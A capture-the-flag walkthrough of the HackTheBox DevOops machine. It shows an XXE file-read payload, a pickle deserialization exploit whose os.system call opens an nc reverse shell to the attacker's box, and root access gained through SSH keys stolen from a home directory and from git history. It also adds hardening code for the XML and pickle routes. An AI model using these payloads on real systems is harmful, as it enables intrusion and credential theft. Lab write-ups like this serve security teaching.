Following is a walkthrough of the HackTheBox DevOops machine.
Vulnerabilities exploited: XML External Entity (XXE) injection in the XML upload handler, and insecure deserialization (arbitrary code execution) through Python's pickle module.
Enumeration:
Nmap port scan:
Command: nmap -A -T4 --open --reason 10.10.10.91
Exploit:
Upon accessing the web server, it appears to be some kind of Blogfeeder application that is still under construction. (The second line of the page shows a local file name, feed.py, which we will need later.)
Start DirBuster with the following settings (enable the "Use Blank Extension" flag, since the interesting paths have no extension):
Dirbuster results:
DirBuster identifies two paths: /upload and /feed.
/upload looks interesting:
Create a text file called upload.txt with some content in it.
Try to upload file upload.txt:
The target expects three XML elements in the uploaded file: Author, Subject and Content.
Searching for XML-based attacks turns up the OWASP page on XML External Entity (XXE) injection: if the parser resolves external entities declared in a DTD, an attacker can make it read local files such as /etc/passwd and return their contents in the response.
Following is a snippet from the above reference link:
Create a new file upload.xml with the following content (the entity xxe is declared as the local file /etc/passwd and then referenced inside Author, so the parser substitutes the file contents there):
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<creds>
<Author>&xxe;</Author>
<Subject>gaurav</Subject>
<Content>gaurav</Content>
</creds>
Try to upload file upload.xml:
We get back the content of /etc/passwd:
Capture this request in Burp Proxy and send it to Repeater (right-click the captured request and choose "Send to Repeater").
Run the same request in repeater tab and check the output.
On the home page of the service we saw the local file name feed.py. Let's try to read that file through the same entity: change the SYSTEM path in the above request from /etc/passwd to the path of feed.py and send it again.
The partial content of feed.py reveals one more route, /newpost, which accepts POST. The /newpost handler passes the request body to Python's pickle module. Unpickling attacker-controlled data is a code execution vulnerability: a pickle can name an arbitrary callable (for example os.system) and its arguments, and the unpickler invokes it while "reconstructing" the object.
Send a GET request to /newpost. Capture this request in Burp Suite and send it to Repeater.
In Repeater, change the request method to POST (right-click the request and select "Change request method").
Looking again at the /newpost code, the handler base64-decodes the request body and hands the result to pickle.loads. So let's write a script that generates a base64-encoded malicious pickle.
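As an added example (not part of the original walkthrough), the Python below generalises the payload above to any local file and shows the server-side check that would have stopped the attack: a document that carries a DOCTYPE, or declares an entity with a SYSTEM/PUBLIC identifier, is refused before anything is resolved. The function names build_xxe_payload, xml_declares_dtd_or_entities and accept_upload are my own; the parser feed.py actually uses is not shown on the page, so the check is written against the standard-library expat parser.

```python
import xml.parsers.expat


def build_xxe_payload(path, root="creds"):
    """Return an upload document whose Author element expands to the local file
    at `path` (the walkthrough's payload with the file name parameterised)."""
    return (
        '<?xml version="1.0" encoding="ISO-8859-1"?>\n'
        '<!DOCTYPE foo [ <!ELEMENT foo ANY >\n'
        '<!ENTITY xxe SYSTEM "file://%s" >]>\n'
        '<%s>\n'
        '  <Author>&xxe;</Author>\n'
        '  <Subject>x</Subject>\n'
        '  <Content>x</Content>\n'
        '</%s>\n'
    ) % (path, root, root)


def xml_declares_dtd_or_entities(data):
    """Parse untrusted XML with expat and report (has_doctype, external_entities).

    expat does not fetch external entities unless an ExternalEntityRefHandler is
    installed, so this only observes what the document asks a resolver to do.
    """
    seen = {"doctype": False, "external": []}

    def on_doctype(name, sysid, pubid, has_internal_subset):
        seen["doctype"] = True

    def on_entity(name, is_param, value, base, sysid, pubid, notation):
        if sysid is not None or pubid is not None:
            seen["external"].append((name, sysid))

    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    raw = data if isinstance(data, bytes) else data.encode("utf-8")
    try:
        parser.Parse(raw, True)
    except xml.parsers.expat.ExpatError:
        pass  # malformed input; the declarations seen so far are still reported
    return seen["doctype"], seen["external"]


def accept_upload(data):
    """Hardened gate for /upload: an XML post has no business carrying a DTD at
    all, so refuse any document that declares one (this also covers billion-laughs
    style entity expansion, not only external file reads)."""
    has_doctype, _externals = xml_declares_dtd_or_entities(data)
    return not has_doctype


if __name__ == "__main__":
    payload = build_xxe_payload("/etc/passwd")
    print(payload)
    print("declarations:", xml_declares_dtd_or_entities(payload))
    print("accepted by hardened gate:", accept_upload(payload))
```

If feed.py parses with lxml (an assumption; the page does not show the parser), the equivalent fix at the parser level is etree.XMLParser(resolve_entities=False, no_network=True); rejecting the DOCTYPE up front is the simpler rule and does not depend on which library is behind the route.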
Exploit code (filename pickle_encode.py):
import pickle
from base64 import urlsafe_b64encode as b64encode

# Reverse shell back to our attack box (10.10.14.42:4444); adjust IP and port.
cmd = """rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.42 4444 >/tmp/f"""

class PleaseSubscribe(object):
    # pickle records what __reduce__ returns: a callable and its arguments.
    # On the server, pickle.loads will call os.system(cmd) to rebuild the object.
    def __reduce__(self):
        import os
        return (os.system, (cmd,))

# Protocol 2 is readable by both Python 2 and Python 3 unpicklers.
print(b64encode(pickle.dumps(PleaseSubscribe(), protocol=2)).decode())
Execute exploit code to generate encoded payload:
Paste above output in HTTP-Body of request:
Start a netcat listener on port 4444 and send request:
On sending the above request, we get a shell on the target machine:
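The following is an added example, not code from the original walkthrough or from feed.py: it shows the vulnerable pattern (pickle.loads on a base64 body) side by side with the fix a developer should have used, an Unpickler whose find_class allow-lists the one class the feed needs. Post, Gadget and the helper names are my own; the real class names in feed.py are not shown on the page. The walkthrough's payload calls os.system with a reverse shell; here the gadget calls os.getcwd so the demonstration has no side effects but still proves that the attacker picks which function runs.

```python
import io
import os
import pickle
from base64 import urlsafe_b64decode, urlsafe_b64encode


class Post(object):
    """The only type the blog feed legitimately needs to load (assumed shape)."""

    def __init__(self, author, subject, content):
        self.author, self.subject, self.content = author, subject, content


class Gadget(object):
    """Attacker-controlled object. pickle stores the callable and arguments that
    __reduce__ returns; the unpickler calls them on load. The walkthrough used
    os.system with a reverse-shell command; os.getcwd is substituted here."""

    def __reduce__(self):
        return (os.getcwd, ())


def encode_post_body(obj):
    """Build a /newpost body the way the exploit does: URL-safe base64 of a
    protocol-2 pickle (readable by Python 2 and Python 3 unpicklers)."""
    return urlsafe_b64encode(pickle.dumps(obj, protocol=2))


def load_unsafe(body):
    """What the vulnerable /newpost handler effectively does."""
    return pickle.loads(urlsafe_b64decode(body))


class PostOnlyUnpickler(pickle.Unpickler):
    """Hardened loader: the only global it will resolve is the Post class, so a
    pickle that references os.system (or anything else) fails before it runs."""

    def find_class(self, module, name):
        if module == Post.__module__ and name == Post.__name__:
            return Post
        raise pickle.UnpicklingError("refusing to load %s.%s" % (module, name))


def load_trusted(body):
    return PostOnlyUnpickler(io.BytesIO(urlsafe_b64decode(body))).load()


def rejects(body):
    """True when the hardened loader refuses the body instead of executing it."""
    try:
        load_trusted(body)
    except pickle.UnpicklingError:
        return True
    return False


if __name__ == "__main__":
    benign = encode_post_body(Post("roosa", "hello", "first post"))
    evil = encode_post_body(Gadget())
    print("benign via hardened loader:", load_trusted(benign).author)
    print("evil via vulnerable loader ran os.getcwd():", load_unsafe(evil))
    print("evil via hardened loader rejected:", rejects(evil))
```

Even the allow-list is only a mitigation: pickle is not a format for untrusted input, and the right fix for a public endpoint is to send the post as JSON (or the XML the /upload route already accepts) and validate the three fields explicitly.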
Spawn bash shell:
Command: python -c 'import pty; pty.spawn("/bin/bash")'
Privilege Escalation:
While performing privilege escalation checks, we found a private SSH key in user roosa's home directory.
Copy this SSH key to our local machine and set its permissions to 600 (ssh refuses a private key that is readable by others).
Try to SSH to the target as roosa using the copied private key.
Command: ssh -i ssh_private_key2.key roosa@10.10.10.91
Got access to the target machine as roosa.
In roosa's home directory, there is a Git repository for a project. Let's check the git log of this project: a file removed or replaced in a later commit is still recoverable from history.
One of the commit messages states "reverted accidental commit with proper key".
Diffing this commit against its parent shows the key that was "accidentally" committed and then replaced, i.e. an SSH private key that no longer exists in the working tree (highlighted in red):
Copy this SSH key to the local machine and set its permissions to 600.
Try to SSH using this new key.
Successfully logged in as root!
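The key recovery above was done by eye in the diff. The Python below is an added example, not part of the original walkthrough, of doing the same thing over a whole history: it reads the text of git log -p (which prints every commit with its diff) and collects any PEM private key that a commit removed or replaced, reconstructing the old version even when the BEGIN/END lines appear as unchanged context and only the key body was swapped. The sample log, the path config/deploy.key and the commit hashes are constructed for the example; the repository's real paths are not shown on the page.

```python
import os

# Constructed excerpt in the shape of `git log -p` output (newest commit first).
# The first commit replaces a key that was committed by mistake, so the old key
# survives only as '-' lines between the unchanged BEGIN/END markers.
SAMPLE_LOG = """\
commit d3adb33fd3adb33fd3adb33fd3adb33fd3adb33f
Author: Dev <dev@example.invalid>
Date:   Mon Jul 2 10:00:00 2018 +0000

    reverted accidental commit with proper key

diff --git a/config/deploy.key b/config/deploy.key
index 1111111..2222222 100644
--- a/config/deploy.key
+++ b/config/deploy.key
@@ -1,5 +1,5 @@
 -----BEGIN RSA PRIVATE KEY-----
-CONSTRUCTEDOLDKEYLINE1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-CONSTRUCTEDOLDKEYLINE2AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-CONSTRUCTEDOLDKEYLINE3AAAA==
+CONSTRUCTEDNEWKEYLINE1BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
+CONSTRUCTEDNEWKEYLINE2BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
+CONSTRUCTEDNEWKEYLINE3BBBB==
 -----END RSA PRIVATE KEY-----

commit c0ffeec0ffeec0ffeec0ffeec0ffeec0ffeec0ff
Author: Dev <dev@example.invalid>
Date:   Sun Jul 1 09:00:00 2018 +0000

    add deploy key

diff --git a/config/deploy.key b/config/deploy.key
new file mode 100644
index 0000000..1111111
--- /dev/null
+++ b/config/deploy.key
@@ -0,0 +1,5 @@
+-----BEGIN RSA PRIVATE KEY-----
+CONSTRUCTEDOLDKEYLINE1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+CONSTRUCTEDOLDKEYLINE2AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+CONSTRUCTEDOLDKEYLINE3AAAA==
+-----END RSA PRIVATE KEY-----
"""


def _strip_side(p):
    """Drop git's a/ or b/ prefix from a diff header path."""
    return p[2:] if p[:2] in ("a/", "b/") else p


def _is_pem_marker(body, kind):
    return body.startswith("-----%s " % kind) and body.endswith("PRIVATE KEY-----")


def find_removed_private_keys(log_text):
    """Return [(commit, path, pem)] for every private key some commit removed.

    Inside a hunk, removed ('-') and context (' ') lines belong to the old file,
    added ('+') lines to the new one, so the old key is rebuilt from the former
    and the latter are skipped. A key that only ever appears as '+' lines (the
    commit that introduced it) is not reported.
    """
    results = []
    commit = path = None
    in_hunk = False
    block = None          # old-version lines of a key while between BEGIN and END
    removed_any = False   # at least one line of that block was a '-' line
    for line in log_text.splitlines():
        if line.startswith("commit "):
            commit, in_hunk, block = line.split()[1], False, None
        elif line.startswith("diff --git "):
            in_hunk, block = False, None
        elif not in_hunk and line.startswith("--- "):
            path = _strip_side(line[4:])
        elif not in_hunk and line.startswith("+++ ") and path == "/dev/null":
            path = _strip_side(line[4:])      # file created in this commit
        elif line.startswith("@@"):
            in_hunk, block = True, None
        elif in_hunk and line[:1] in ("-", " "):
            body = line[1:]
            if _is_pem_marker(body, "BEGIN"):
                block, removed_any = [body], line.startswith("-")
            elif block is not None:
                block.append(body)
                removed_any = removed_any or line.startswith("-")
                if _is_pem_marker(body, "END"):
                    if removed_any:
                        results.append((commit, path, "\n".join(block) + "\n"))
                    block = None
        elif in_hunk and line.startswith("+"):
            continue                          # new-version line, not part of the old key
        else:
            block = None                      # key blocks are contiguous
    return results


def save_key(pem, dest):
    """Write a recovered key with mode 0600, as ssh requires before it will use it."""
    fd = os.open(dest, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    with os.fdopen(fd, "w") as fh:
        fh.write(pem)


if __name__ == "__main__":
    for commit, path, pem in find_removed_private_keys(SAMPLE_LOG):
        print("removed in %s (%s):\n%s" % (commit[:7], path, pem))
```

Against a real checkout, feed it `git log -p --all` (the --all flag also walks branches and tags that no longer point at HEAD's history); once you have the commit and path, `git show <commit>^:<path>` prints the exact pre-change file, which is the quickest way to get a byte-for-byte copy of the key.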